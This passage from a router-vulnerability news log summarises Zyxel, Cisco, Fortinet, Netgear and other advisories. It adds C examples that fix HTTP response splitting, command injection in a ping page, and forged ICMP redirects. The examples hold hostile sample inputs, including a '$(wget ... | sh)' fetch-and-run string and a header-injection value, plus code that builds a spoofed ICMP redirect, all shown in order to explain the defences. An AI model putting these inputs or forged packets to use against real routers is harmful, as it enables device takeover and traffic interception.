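Two items on that list are HTTP response splitting. Here is an added C example, not Asus code, of how that bug arises in a post-login redirect and how to close it; the "next" parameter name and the responses are constructed for the example. The same check also covers the open redirect item on the list, since both come down to trusting a request parameter inside a header.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Asus firmware. After login a router UI redirects to a
 * page named by a request parameter; "next" is an assumed parameter name. */

/* Vulnerable: the parameter is copied into the Location header verbatim.
 * A value containing "\r\n" terminates the header early and everything
 * after it becomes headers (or, after "\r\n\r\n", a body) chosen by the
 * attacker: a Set-Cookie to fix the session, or a whole fake page. */
static int build_redirect_unsafe(char *out, size_t n, const char *next)
{
    return snprintf(out, n,
                    "HTTP/1.1 302 Found\r\nLocation: %s\r\nContent-Length: 0\r\n\r\n",
                    next);
}

/* A header field value may contain visible ASCII, space and tab only
 * (RFC 9110 field-content); CR, LF and every other control byte are out. */
static int header_value_ok(const char *v)
{
    for (; *v; v++) {
        unsigned char c = (unsigned char)*v;
        if (c < 0x20 || c == 0x7f)
            return 0;
    }
    return 1;
}

/* Hardened: reject control bytes, and close the open redirect as well by
 * insisting on a local path ("/x" but not "//evil.example", which
 * browsers read as a scheme-relative URL). */
static int build_redirect_safe(char *out, size_t n, const char *next)
{
    if (!header_value_ok(next) || next[0] != '/' || next[1] == '/')
        return snprintf(out, n, "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n");
    return build_redirect_unsafe(out, n, next);   /* value is now known clean */
}

/* How many header lines did the response end up with? Lets a test see
 * the injected ones. */
static int count_header_lines(const char *resp)
{
    int lines = 0;
    const char *p = resp;
    while ((p = strstr(p, "\r\n")) != NULL) {
        lines++;
        p += 2;
        if (p[0] == '\r' && p[1] == '\n')   /* empty line ends the header block */
            break;
    }
    return lines;
}

int main(void)
{
    char resp[512];
    const char *attack = "/status.asp\r\nSet-Cookie: session=attacker";   /* constructed */

    build_redirect_unsafe(resp, sizeof resp, attack);
    printf("unsafe: %d header lines\n%s", count_header_lines(resp), resp);
    build_redirect_safe(resp, sizeof resp, attack);
    printf("safe:   %s", resp);
    return 0;
}
```

Rejecting the request outright is deliberate: percent-encoding the CR and LF instead would keep the redirect working but hides the fact that someone is probing the box.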
MAY 2023
Still more critical Zyxel bugs
Zyxel warns of critical vulnerabilities in firewall and VPN devices
by Bill Toulas of Bleeping Computer May 25, 2023
Quoting: "Zyxel is warning customers of two critical-severity vulnerabilities in several of its firewall and VPN products that attackers could leverage without authentication. Both security issues are buffer overflows and could allow denial-of-service (DoS) and remote code execution on vulnerable devices." Both bugs are rated 9.8 out of 10 which means they are really really bad. Bug fixes are available. Bugs are CVE-2023-33009 and CVE-2023-33010. A different Zyxel bug, one that had a patch released in April 2023, is being actively exploited by bad guys. That bug affects the same firewall and VPN products as these two.
Still more critical Cisco bugs
Cisco squashes critical bugs in small biz switches
by Jeff Burt of The Register May 18, 2023
Cisco software has more critical bugs than grains of sand on a beach. This time, there are four critical security vulnerabilities in several of their switches. And, of course, Cisco did not find the bugs on their own, someone else reported them. The flaws are in the web interface and they can be used to run arbitrary code with root privileges. All the bugs have a CVSS severity rating of 9.8 out of 10. As we have seen many times before with Cisco, the bugs are due to improper validation of requests sent to the web interface. It's like they are not even trying. Or, their programmers are as lazy as lazy gets. Buggy devices: the 250 Series smart switches, 350 Series managed switches, 350X Series and 550X stackable managed switches. Also the Business 250 Series smart switches and Business 350 Series managed switches. The bugs are CVE-2023-20159, CVE-2023-20160, CVE-2023-20161 and CVE-2023-20189. Another thing we have seen before with Cisco: three other buggy switches won't be fixed because they are toooooooooooooooooooo old.
Still another Fortinet bug
A More Complete Exploit for Fortinet CVE-2022-42475
by Carl Livitt and Jon Williams of Bishop Fox May 17, 2023
On this page is a writeup about a bug in Fortinet FortiOS software from March 2023 and another writeup about another bug from October 2022. This is yet another bug.
Quoting: "Recently, there has been some buzz about remotely exploitable vulnerabilities in Fortinet security appliances, especially FortiGate firewalls. This blog focuses on one such bug: CVE-2022-42475, a remotely exploitable heap overflow in the SSL VPN component of FortiGate and FortiProxy appliances. It was discovered in the wild by Fortinet in late 2022 during an investigation into a compromised firewall." The article is a very detailed look at the bug.
APRIL 2023
Many Many Zyxel bugs
Zyxel Firewall Devices Vulnerable to Remote Code Execution Attacks - Patch Now
by Ravie Lakshmanan of Hacker News April 28, 2023
Zyxel just released three security advisories to fix what looks like nine different bugs in their assorted devices. Each clump of bugs was found by a different security company. The first clump is a lone critical security flaw in its firewall devices that can be exploited to achieve remote code execution on buggy systems. This affects ATP, USG FLEX, VPN and ZyWALL/USG. The second clump of fixes includes a high-severity post-authentication command injection bug that affects select firewall versions and permits an authenticated bad guy to execute OS commands remotely. The third clump of fixes includes five high-severity flaws and one medium-severity bug affecting several firewalls and APs. These bugs could result in code execution and cause a denial-of-service. You may also want to scan the rest of this page and site for more references to Zyxel.
One TP-Link router is buggy. Other models? None of your damn business
TP-Link Archer WiFi router flaw exploited by Mirai malware
by Bill Toulas of Bleeping Computer April 25, 2023
"The Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms. Researchers first abused the flaw during the Pwn2Own Toronto hacking event in December 2022, where two separate hacking teams breached the device using different pathways LAN and WAN side." This is a big time bug, a bad guy can use it to execute arbitrary code in the context of root. Like many bugs, this is due to the programmers being lazy and not validating user input. It seems the programmers are stupid too: the company first attempted to fix this in February, but the fix was incomplete. Personally, I do not want to use firmware written by lazy stupid people. Adding insult to injury, in their description of the fixed firmware, this is all TP-Link says: "Fixed some security issues." And, the biggest reason not to use a router from TP-Link is their other 23 models of routers. Are they buggy too? No one says. How likely is it that of the many many different router models, only this one has the bug?
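Cisco's "improper validation of requests sent to the web interface" above, the unvalidated input behind this TP-Link bug, and the dozens of "Command Injection" advisories on the Netgear list further down are usually the same mistake. Here is an added C example, not Cisco, TP-Link or Netgear code: a ping diagnostic page built the injectable way, and the allow-list plus exec-without-a-shell that fixes it. The binary path /bin/ping and the ping options are assumptions for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Added example, not vendor code. A "diagnostics" page lets the user
 * ping a host; the host name comes straight from the request. */

/* Vulnerable: the host is spliced into a shell command line. With a host
 * of "8.8.8.8; reboot" or "$(wget -O- http://x/a|sh)" the shell runs the
 * attacker's part too, as the httpd user, which on most routers is root.
 * This function only builds the string; calling system() on it is the bug. */
static int build_ping_cmd_unsafe(char *out, size_t n, const char *host)
{
    return snprintf(out, n, "ping -c 1 %s", host);
}

/* Hardened, step 1: an allow-list of what a host may look like (letters,
 * digits, '.', '-', ':' for IPv6), with a length cap. Everything a shell
 * cares about (; | & $ ` ( ) < > space newline) is simply not allowed. */
static int host_ok(const char *h)
{
    size_t len = strlen(h);
    if (len == 0 || len > 253)
        return 0;
    for (; *h; h++) {
        char c = *h;
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '.' || c == '-' || c == ':'))
            return 0;
    }
    return 1;
}

/* Hardened, step 2: no shell at all. execv() gets the host as a single
 * argv element, so metacharacters are never interpreted, and "--" stops
 * a host such as "-f" from being read as a ping option. The binary path
 * is an assumption; a real build pins whatever path its firmware uses. */
static int run_ping_safe(const char *host)
{
    if (!host_ok(host))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "ping", "-c", "1", "--", (char *)host, NULL };
        execv("/bin/ping", argv);
        _exit(127);                      /* exec failed: no ping at that path */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[256];
    const char *attack = "8.8.8.8; reboot";          /* constructed attacker input */

    build_ping_cmd_unsafe(cmd, sizeof cmd, attack);
    printf("what system() would have run: %s\n", cmd);
    printf("host_ok(\"%s\") = %d\n", attack, host_ok(attack));
    printf("run_ping_safe(attack) = %d (rejected before any process starts)\n",
           run_ping_safe(attack));
    printf("run_ping_safe(\"127.0.0.1\") = %d (ping's exit status, 127 if absent)\n",
           run_ping_safe("127.0.0.1"));
    return 0;
}
```

The "--" relies on the ping binary's option parser honouring it (getopt-based ones do; check the firmware's own ping), and the allow-list deliberately refuses IPv6 zone IDs such as fe80::1%eth0, because '%' is not on it. Either of the two steps alone is an improvement; together they mean a bypass of the allow-list still has no shell to talk to.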
Yet another reason to use VLANs
With ICMP magic, you can snoop on vulnerable HiSilicon, Qualcomm-powered Wi-Fi
by Thomas Claburn of The Register April 7, 2023
Sub-heading: WPA stands for will-provide-access, if you can successfully exploit a target's setup
"A vulnerability identified in at least 55 Wi-Fi router models can be exploited by miscreants to spy on victims' data as it's sent over a wireless network." At least 55 routers. The bug is in Qualcomm and HiSilicon chips found in various wireless access points. The flaw (CVE-2022-25667) prevents the devices from blocking forged Internet Control Message Protocol (ICMP) messages. These forged messages can be abused to hijack and observe a victim's wireless connectivity. The technical pre-reqs to abuse this flaw are fairly high. A bad guy can only intercept and snoop on the traffic of another device on the same network. The bad guy also needs to be able to directly communicate with the victim device and know the victim's IP address. In addition, the bad guy must find an open UDP port on the victim device - any open port will do. Needless to say, intercepted traffic is safer if encrypted, so HTTPS and secure DNS are great defenses. The bug seems widespread, they tested 55 products from ten vendors and all were buggy. The vulnerable devices they tested were made by: Cisco, Netgear, 360, Mercury, Xiaomi, Ruijie, H3C, Huawei, Tenda and TP-Link.
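Added C example, not Qualcomm, HiSilicon or any vendor's firmware, of what "blocking forged ICMP messages" means at the access point: a forged ICMP redirect as an attacker on the same Wi-Fi would send it, built with valid checksums, and the per-packet check that drops it because a redirect arriving from a client can never be legitimate. The addresses, the victim and the quoted UDP datagram are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not vendor code. The check an access point's forwarding
 * path should apply to IPv4 packets arriving from its own wireless
 * clients. An ICMP Redirect (type 5) is only ever legitimately sent by a
 * router, so one originating from a client is forged by definition and
 * must be dropped rather than forwarded to the victim. */

/* RFC 1071 one's-complement checksum; returns 0 over a correct packet. */
static uint16_t inet_checksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) {
        sum += (uint32_t)((p[0] << 8) | p[1]);
        p += 2;
        len -= 2;
    }
    if (len)
        sum += (uint32_t)(p[0] << 8);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

enum verdict { FORWARD = 0, DROP_NOT_IPV4, DROP_TRUNCATED, DROP_BAD_CSUM, DROP_REDIRECT };

/* pkt points at the IPv4 header; the 802.11/Ethernet header is already gone. */
static enum verdict client_ipv4_verdict(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return DROP_NOT_IPV4;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t total = (size_t)((pkt[2] << 8) | pkt[3]);
    if (ihl < 20 || total < ihl || total > len)
        return DROP_TRUNCATED;
    if (pkt[9] != 1)                     /* protocol 1 = ICMP; anything else passes here */
        return FORWARD;
    const uint8_t *icmp = pkt + ihl;
    size_t icmplen = total - ihl;
    if (icmplen < 8)
        return DROP_TRUNCATED;
    if (inet_checksum(icmp, icmplen) != 0)
        return DROP_BAD_CSUM;
    if (icmp[0] == 5)                    /* type 5 = Redirect (RFC 792) */
        return DROP_REDIRECT;
    return FORWARD;
}

/* Build the forged packet an attacker on the same SSID would send: source
 * spoofed as the real gateway 10.0.0.1, destination the victim 10.0.0.23,
 * payload "send traffic via <gw> instead". Returns bytes written. */
static size_t build_forged_redirect(uint8_t *buf, size_t n, const uint8_t gw[4])
{
    static const uint8_t ip_hdr[20] = {
        0x45, 0x00, 0x00, 56,  0x00, 0x00, 0x40, 0x00,   /* v4, ihl 5, len 56, DF */
        64,   1,    0x00, 0x00,                          /* ttl, proto ICMP, csum */
        10, 0, 0, 1,                                     /* spoofed source: gateway */
        10, 0, 0, 23                                     /* destination: victim */
    };
    /* A redirect quotes the IP header + 8 bytes of the datagram it claims
     * to be about: here a UDP packet from the victim to port 53. */
    static const uint8_t quoted[28] = {
        0x45, 0x00, 0x00, 28, 0x00, 0x00, 0x40, 0x00, 64, 17, 0x00, 0x00,
        10, 0, 0, 23,  93, 184, 216, 34,
        0xc0, 0x00, 0x00, 0x35, 0x00, 0x08, 0x00, 0x00
    };
    if (n < sizeof ip_hdr + 8 + sizeof quoted)
        return 0;

    uint8_t *ip = buf, *icmp = buf + sizeof ip_hdr;
    memcpy(ip, ip_hdr, sizeof ip_hdr);
    icmp[0] = 5;                          /* Redirect */
    icmp[1] = 1;                          /* code 1: redirect for the host */
    icmp[2] = icmp[3] = 0;
    memcpy(icmp + 4, gw, 4);              /* "use this gateway" = the attacker */
    memcpy(icmp + 8, quoted, sizeof quoted);

    uint16_t c = inet_checksum(icmp, 8 + sizeof quoted);
    icmp[2] = (uint8_t)(c >> 8);
    icmp[3] = (uint8_t)(c & 0xff);
    c = inet_checksum(ip, sizeof ip_hdr);
    ip[10] = (uint8_t)(c >> 8);
    ip[11] = (uint8_t)(c & 0xff);
    return sizeof ip_hdr + 8 + sizeof quoted;
}

int main(void)
{
    uint8_t pkt[128];
    const uint8_t attacker[4] = { 10, 0, 0, 66 };
    size_t len = build_forged_redirect(pkt, sizeof pkt, attacker);
    printf("forged redirect: %zu bytes, verdict %d (4 = DROP_REDIRECT)\n",
           len, client_ipv4_verdict(pkt, len));
    return 0;
}
```

The client side has a matching defense: ignore redirects entirely, which on Linux is net.ipv4.conf.all.accept_redirects = 0 (and send_redirects = 0 on the router itself). The page's VLAN advice attacks the other precondition, the attacker being on the same network as the victim.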
MARCH 2023
D-Link drops the ball on security
Security Bulletin by D-Link March 2023
D-Link says "The security and performance of your D-Link devices is of utmost importance to us across all product lines." And yet, take a look at the web page where they publish Security Advisories. Nothing from 2021. Nothing from 2022. Nothing from this year either. Very suspicious. Especially since the items below show there have been security issues with D-Link routers.
Netgear is having a bad stretch
NETGEAR Product Security
Reading about the March 2023 Netgear bugs sent me to the NETGEAR page where they list all their security bug fixes. Pretty big list as you can see below. Netgear issued 18 security bug fixes this month, 26 security bug fixes in December and 70 in November. Chances are, there were some non-security bugs too.
I am starting to consider that perhaps Netgear is not very good at software.
3/22/2023 Security Advisory for Cleartext Transmission on Some Orbi WiFi Systems, PSV-2022-0189
3/22/2023 Security Advisory for Command Injection on Some Orbi WiFi Systems, PSV-2022-0188
3/22/2023 Security Advisory for Command Injection on Some Orbi WiFi Systems, PSV-2022-0187
3/22/2023 Security Advisory for Post-authentication Command Injection on the RBR750, PSV-2022-0186
3/15/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2022-0182
3/15/2023 Security Advisory for Authentication Bypass on Some Routers, PSV-2021-0264
3/15/2023 Security Advisory for Security Misconfiguration on Some Routers and WiFi Systems, PSV-2021-0196
3/15/2023 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2021-0182
3/15/2023 Security Advisory for Post-Authentication Command Injection on Some WiFi Systems, PSV-2021-0179
3/15/2023 Security Advisory for Pre-Authentication Command Injection on Some Router and Extenders, PSV-2021-0076
3/15/2023 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2020-0578
3/15/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers and Extenders, PSV-2020-0482
3/14/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2020-0481
3/14/2023 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2020-0325
3/14/2023 Security Advisory for Denial of Service on Some Routers, PSV-2020-0283
3/14/2023 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0213
3/14/2023 Security Advisory for Security Misconfiguration on Some Routers, PSV-2017-2454
3/9/2023 Security Advisory for Multiple Vulnerabilities on the RAX30, PSV-2022-0352
2/14/2023 Security Advisory for Pre-Authentication Command Injection on Some Cable Modem Routers, PSV-2022-0208
12/28/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0104
12/28/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2019-0208
12/28/2022 Security Advisory for Security Misconfiguration on Some Routers, PSV-2019-0265
12/28/2022 Security Advisory for Authentication Bypass on CAX30, PSV-2022-0196
12/28/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, Extenders, and WiFi Systems, PSV-2021-0275
12/28/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2021-0165
12/28/2022 Security Advisory for Denial of Service on Some Routers and WiFi Systems, PSV-2021-0189
12/28/2022 Security Advisory for Post-Authentication Command Injection on CAX30, PSV-2022-0194
12/28/2022 Security Advisory for Authentication Bypass on CAX30, PSV-2022-0195
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0194
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0221
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0249
12/28/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers and WiFi Systems, PSV-2020-0333
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0478
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0549
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0568
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0569
12/28/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2020-0288
12/28/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0565
12/28/2022 Security Advisory for Sensitive Information Disclosure on Some Routers and WiFi Systems, PSV-2020-0428
12/28/2022 Security Advisory for Sensitive Information Disclosure on ReadyNAS OS 6, PSV-2022-0036
12/28/2022 Security Advisory for Sensitive Information Disclosure on Insight iOS App, PSV-2022-0094
12/28/2022 Security Advisory for Sensitive Information Disclosure on Some WiFi Systems, PSV-2020-0448
12/28/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2022-0165
12/13/2022 Security Advisory for Pre-authentication Buffer Overflow on the RAX30, PSV-2022-0291
12/13/2022 Security Advisory for Multiple Vulnerabilities on the RAX30, PSV-2022-0028 & PSV-2022-0073
11/23/2022 Security Advisory for Pre-Authentication Buffer Overflow on RAX120, PSV-2022-0018
11/8/2022 Security Advisory for Denial of Service on Some Routers, PSV-2022-0001
11/8/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2019-0289
11/8/2022 Security Advisory for Security Misconfiguration on R7000, PSV-2020-0005
11/8/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2022-0096
11/8/2022 Security Advisory for Pre-Authentication Stack Overflow on Some Routers, PSV-2019-0121
11/8/2022 Security Advisory for Security Misconfiguration on R6700v3, PSV-2019-0065
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers and Extenders, PSV-2019-0145
11/8/2022 Security Advisory for Post-Authentication Command Injection on Some Routers, PSV-2022-0060
11/8/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2019-0087
11/8/2022 Security Advisory for Denial of Service on Some Routers and Extenders, PSV-2019-0159
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2019-0156
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers and Extenders, PSV-2019-0155
11/8/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0164
11/8/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2019-0196
11/8/2022 Security Advisory for Stored Cross Site Scripting on Some Routers, PSV-2020-0016
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers, Extenders, and WiFi Systems, PSV-2020-0122
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Switches, PSV-2022-0016
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Switches, PSV-2022-0015
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0518
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2021-0315
11/7/2022 Security Advisory for Authentication Bypass on Some Routers and Extenders, PSV-2021-0316
11/7/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2022-0033
11/7/2022 Security Advisory for Post-authentication Buffer Overflow on Some Routers, PSV-2022-0156
11/7/2022 Security Advisory for Pre-authentication Buffer Overflow on Multiple Products, PSV-2022-0155
11/7/2022 Security Advisory for Pre-authentication Stack Overflow on some Routers and Nighthawk WiFi Mesh Systems, PSV-2022-0146
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers and WiFi Systems, PSV-2021-031
11/7/2022 Security Advisory for Multiple Vulnerabilities on the R7000P, PSV-2022-0144 & PSV-2022-0145
11/7/2022 Security Advisory for Pre-Authentication Command Injection on R7000, PSV-2022-0115
11/7/2022 Security Advisory for Post-Authentication Command Injection on R6260, PSV-2021-0271
11/7/2022 Security Advisory for Pre-Authentication Stack Overflow on Some Routers, PSV-2021-0346
11/7/2022 Security Advisory for Pre-Authentication Stack Overflow on Some Routers, PSV-2021-0347
11/7/2022 Security Advisory for Post-Authentication Stack Overflow on R7000, PSV-2019-0167
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0118
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2021-0304
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0345
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on R7000P, PSV-2020-0344
11/7/2022 Security Advisory for Denial of Service on Some WiFi Systems, PSV-2020-0295
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2020-0299
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0303
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2020-0314
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on R7000P, PSV-2020-0312
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on R7000P, PSV-2020-0310
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on R7000P, PSV-2020-0311
11/7/2022 Security Advisory for Stored Cross Site Scripting on Some Routers and WiFi Systems, PSV-2020-0209
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers, Extenders, and WiFi Systems, PSV-2020-0457
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0217
11/7/2022 Security Advisory for Stored Cross Site Scripting on EX7500, PSV-2020-0252
11/7/2022 Security Advisory for Stored Cross Site Scripting on EX7500, PSV-2020-0251
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0259
11/7/2022 Security Advisory for Denial of Service on WiFi Systems, PSV-2020-0260
11/7/2022 Security Advisory for Post-Authentication Stack Overflow on R7000P, PSV-2020-0267
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0358
11/7/2022 Security Advisory for Post-Authentication Command Injection on Some Routers, PSV-2022-0012
11/7/2022 Security Advisory for Stored Cross Site Scripting on Some Routers, PSV-2020-0447
11/7/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers and WiFi Systems, PSV-2020-0589
11/7/2022 Security Advisory for Missing Function Level Access Control on Some Routers, PSV-2022-0127
11/7/2022 Security Advisory for Missing Function Level Access Control on R7000, PSV-2022-0133
11/7/2022 Security Advisory for Denial of Service on Some Routers, Extenders, and WiFi Systems, PSV-2021-0153
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers and WiFi Systems, PSV-2020-0449
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2019-0186
11/7/2022 Security Advisory for Post-Authentication Buffer Overflow on Some Routers, PSV-2019-0188
11/7/2022 Security Advisory for Denial of Service on Some Routers, PSV-2019-0215
11/7/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2021-0263
11/7/2022 Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2022-0061
11/7/2022 Security Advisory for Sensitive Information Disclosure on Some Routers and Extenders, PSV-2019-0248
11/6/2022 Security Advisory for Pre-Authentication Command Injection on Some Routers, PSV-2021-0338
11/6/2022 Security Advisory for Authentication Bypass on Some Routers and Extenders, PSV-2021-0337
11/6/2022 Security Advisory for Post-Authentication Stack Overflow on Some Routers, PSV-2022-0005
11/6/2022 Security Advisory for Post-Authentication Stack Overflow on XR300, PSV-2022-0140
Cisco publicizes Netgear bugs
If your Netgear Orbi router isn’t patched, you’ll want to change that pronto
by Dan Goodin of Ars Technica March 22, 2023
The Talos security team (part of Cisco) found four bugs in Netgear routers and within the allotted 90 days Netgear fixed three of them. The remaining bug is hard to exploit. Boring. What's interesting is that two articles referred to remote bad guys exploiting the bugs yet all the descriptions talk about local attacks. So, maybe a bit of hype. Also, Netgear has a hidden Telnet service. Their first attempt to fix one of the bugs was half-assed so it had to be re-done. Bigger picture: Talos found a bug in the RBR750 and said nothing about any other Orbi models. Netgear too, said nothing about any other models. Are we supposed to believe that of the dozen or so Orbi devices only one model had this bug? Really? To me, this is a huge reason to avoid consumer routers.
Critical bug in Fortinet devices
Fortinet: New FortiOS bug used as zero-day to attack government networks
by Sergiu Gatlan of Bleeping Computer March 13, 2023
A new FortiOS bug (CVE-2022-41328) had a fix released on March 7th, after the bug had already been exploited in the wild. The attackers are targeting government and large organizations. The bug allowed attackers to execute unauthorized code or commands. Interestingly, the attack was noticed when some Fortigate devices shut themselves down after a firmware integrity check failed. Some of their devices verify the integrity of system components and, if a compromise is detected, they automatically shut down and stop booting to block a network breach.
Just three months ago, there was another big flaw in Fortinet devices.
FEBRUARY 2023
Aruba devices are a security disaster
Aruba Networks fixes six critical vulnerabilities in ArubaOS
by Bill Toulas of Bleeping Computer March 1, 2023
I started listing router flaws to convince people not to use consumer grade routers. It turns out that when stepping up, at least to Aruba, the security is no better. Maybe worse. Quoting
"Aruba Networks published a security advisory to inform customers about six critical-severity vulnerabilities impacting multiple versions of ArubaOS, its proprietary network operating system." SIX CRITICAL BUGS. Buggy devices can be totally taken over by a remote bad guy. And, all the bugs were found by one guy. The bugs are in the Aruba Networks access point management protocol, aka the PAPI protocol. Their own protocol. It seems they are not trustworthy. Aruba has released fixes. And, more: several product versions that have reached End of Life (EoL) are also affected by these bugs and will not be patched. Adding insult to injury, the EoL products are also vulnerable to another 15 high-severity and eight medium-severity vulnerabilities. What a s**t show.
JANUARY 2023
Many Zyxel bugs
Positive Technologies helps fix vulnerabilities in routers and other Zyxel devices
by Positive Technologies February 1, 2023
Zyxel has published some fixes for 4 bugs discovered by Positive Technologies expert Nikita Abramov in several series of Wi-Fi routers. The routers work on 4G and 5G networks. The vulnerabilities affected other Zyxel network devices as well, including optical network terminals, Internet gateways, and Wi-Fi amplifiers. Among the buggy devices:
4G LTE routers: LTE3202-M437, LTE3316-M604, LTE7480-M804, LTE7490-M904
5G NR routers: NR5103, NR5103E, NR7101, NR7102, NR7103
Optical network terminals (PM7320-B0 and others)
Internet gateways (EX5510-B0 and others)
Wi-Fi amplifiers (WX3100-T0 and others)
Quoting: "... many buffer overflow vulnerabilities arise from incorrect handling of memory (bad allocation or size calculation) or during the data parsing stage, and the execution of commands becomes possible if certain special characters are not filtered. Such flaws often arise from the negligence of developers or insufficient testing." Ouch. It is not at all clear if Zyxel ever finished issuing bug fixes for all the vulnerable devices.
Cisco to their customers: F... Off
Cisco warns of auth bypass bug with public exploit in EoL routers
by Sergiu Gatlan of Bleeping Computer January 11, 2023
The routers are old, they are buggy and Cisco will not fix them. As the company has done many times before, their solution is for you to buy another router. This bug is in the web-based management interface of the Cisco Small Business RV016, RV042, RV042G, and RV082 routers. The bug is as bad as bad gets, a remote bad guy can get root access to a buggy router. At this point, I wonder if all Cisco routers are buggy. This bug has the same root cause as many of the previous Cisco bugs: improper validation of user input. The bug is CVE-2023-20025 and it was found by Hou Liuyang of Qihoo 360 Netlab. A work-around is to disable remote administration. The article mentions another similar case: Cisco would not fix a critical flaw in the RV110W, RV130, RV130W, and RV215W EoL routers.
DECEMBER 2022
Security flaw in Netgear routers
Netgear warns users to patch recently fixed WiFi router bug
by Sergiu Gatlan of Bleeping Computer December 29, 2022
Quoting: "Netgear has fixed a high-severity vulnerability affecting multiple WiFi router models and advised customers to update their devices to the latest available firmware as soon as possible." The buggy devices include the AC and AX Nighthawks. Specifically, models RAX40, RAX35, R6400v2, R6700v3, R6900P, R7000P, R7960P and R8000P. The bug is a pre-authentication buffer overflow, which means it can be exploited without knowing the router password. Neither Netgear nor the article said if it is exploitable from the LAN side, WAN side or both. The article said the bug is simple to exploit and Netgear owners are urged to update their firmware ASAP. Neither Netgear nor the article said how the company learned of the flaw. I mention this because the Netgear RAX30 was hacked at the recent PWN2OWN contest (see the Router News page).
OCTOBER 2022
Even high end devices can have critical bugs
Fortinet warns admins to patch critical auth bypass bug immediately
by Sergiu Gatlan of Bleeping Computer October 7, 2022
Fortinet has warned their customers of a critical vulnerability in the FortiGate firewalls, FortiProxy web proxies and FortiSwitch Manager (FSWM) management platforms. Bug fixes are available.
The bug, CVE-2022-40684, is an authentication bypass in the administrative interface. It allows remote bad guys to log into vulnerable devices. They offer the usual work-arounds for cases where the software can not be updated: limit the source IPs that can access the admin UI or disable remote management entirely.
SEPTEMBER 2022
Really, I mean it, don't buy Cisco routers
